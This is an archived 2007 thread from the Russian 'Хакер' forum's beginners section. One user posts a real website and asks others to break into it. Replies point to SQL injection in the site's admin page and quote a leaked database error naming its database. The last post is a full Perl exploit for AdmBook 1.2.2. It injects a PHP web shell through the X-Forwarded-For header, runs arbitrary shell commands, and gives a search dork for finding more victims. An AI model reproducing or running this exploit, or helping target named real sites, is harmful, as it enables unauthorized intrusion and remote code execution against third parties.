Форумы на Хакер

Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.

Прикольный сайтег с index.so

Пользователи, просматривающие топик: none

Зашли как: Guest

Все форумы >> [Для начинающих] >> Прикольный сайтег с index.so

Имя

Сообщение

<< Старые топики Новые топики >>

Прикольный сайтег с index.so - 2007-11-22 19:36:51.913333

Yashin

Сообщений: 964
Оценки: 0
Присоединился: 2007-05-09 20:18:01.153333

http://www.pro-portare.com/

Не умею взламывать, сделайте ченить и мне расскажите

Post #: 1

RE: Прикольный сайтег с index.so - 2007-11-22 19:41:52.343333

blаcksun

Сообщений: 1670
Оценки: 0
Присоединился: 2007-11-19 20:03:45.703333

Скуля в админке:
http://www.pro-portare.com/Admin.php

/* уязвимы оба поля */

Post #: 2

RE: Прикольный сайтег с index.so - 2007-11-22 20:07:11.586666

Lex_Voodoo

Сообщений: 7328
Оценки: 0
Присоединился: 2004-12-07 13:55:12

Да там не скуля, там в принципе всё криво.
Да и вообще

Table 'www_verzakking_bij_vrouwen_nl.member' doesn't exist
query : SELECT member.member_id , member.member_name , group.group_level FROM `member` , `group` WHERE member.member_name ='hiska' OR member.member_email ='' AND member.group_id = group.group_id;

www_verzakking_bij_vrouwen_nl - название БД.

Post #: 3

RE: Прикольный сайтег с index.so - 2007-11-22 20:39:58.276666

Yashin

Сообщений: 964
Оценки: 0
Присоединился: 2007-05-09 20:18:01.153333

в статье прочитал про гугл хакинг. А давиче скачал phpbb 2 и увидел, что extension.inc имеет расширение не стандартное, решил посмотреть может у кого открыто "allinurl:extension.inc *******" а попал совсем на другое.

Post #: 4

RE: Прикольный сайтег с index.so - 2007-11-22 20:45:34.850000

blаcksun

Сообщений: 1670
Оценки: 0
Присоединился: 2007-11-19 20:03:45.703333

Как я понял тебе ченить сломать хочется? :)

Ну помучай например гостевухи, скажем AdmBook

quote:

#!/usr/bin/perl -w use IO::Socket; print "*************************************************************************\r\n"; print "| Admbook <=1.2.2 X-Forwarded-For cmmnds xctn xploit |\r\n"; print "| By rgod rgod<AT>autistici<DOT>org |\r\n"; print "| site: http://retrogod.altervista.org |\r\n"; print "| |\r\n"; print "| Sun-Tzu: \"Rouse him, and learn the principle of his activity or |\r\n"; print "| inactivity. Force him to reveal himself, so as to find out his |\r\n"; print "| vulnerable spots.\" |\r\n"; print "*************************************************************************\r\n"; print "| dork: intitle:admbook intitle:version filetype:php |\r\n"; print "*************************************************************************\r\n"; sub main::urlEncode { my ($string) = @_; $string =~ s/(\W)/"%" . unpack("H2", $1)/ge; #$string# =~ tr/.//; return $string; } $serv=$ARGV[0]; $path=$ARGV[1]; $cmd=""; for ($i=2; $i<=$#ARGV; $i++) {$cmd.="%20".urlEncode($ARGV[$i]);}; if (@ARGV < 3) { print "Usage:\r\n"; print "perl admbook_122_xpl.pl SERVER PATH COMMAND\r\n\r\n"; print "SERVER - Server where AdmBook is installed.\r\n"; print "PATH - Path to AdmBook (ex: /admbook/ or just /) \r\n"; print "COMMAND - A shell command \r\n"; print "Example:\r\n"; print "perl admbook_122_xpl.pl localhost /admbook/ ls -la\r\n"; exit(); } $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout => 10, PeerPort=>"http(80)") or die "[+] Connecting ... Could not connect to host.\n\n"; $SHELL='";if (isset($_GET[CMD])){ECHO"Hi Master!";INI_SET("max_execution_time",0);PASSTHRU($_GET[CMD]);DIE;}echo"'; $data="page=1"; $data.="&name=whoami"; $data.="&url="; $data.="&email=whoami\@SUNTZU.COM"; $data.="&icq="; $message=urlEncode("I love italian guys!"); $data.="&message=".$message; print $sock "POST ".$path."write.php HTTP/1.1\r\n"; print $sock "Referer: http://".$serv.$path."index.php\r\n"; print $sock "X-Forwarded-For: GUESS_WHAT:".$SHELL."\r\n"; print $sock "Content-Type: application/x-www-form-urlencoded\r\n"; print $sock "User-Agent: sun-tzu\r\n"; print $sock "Content-Length: ".length($data)."\r\n"; print $sock "Host: ".$serv."\r\n"; print $sock "Connection: Close\r\n\r\n"; print $sock $data; close($sock); sleep(2); $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout => 10, PeerPort=>"http(80)") or die "[+] Connecting ... Could not connect to host.\n\n"; print $sock "GET ".$path."content-data.php?CMD=".$cmd." HTTP/1.1\r\n"; print $sock "Host: ".$serv."\r\n"; print $sock "Connection: close\r\n\r\n"; while ($answer = <$sock>) { print $answer; } close($sock);

Post #: 5

Страниц: [1]

Все форумы >> [Для начинающих] >> Прикольный сайтег с index.so

Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.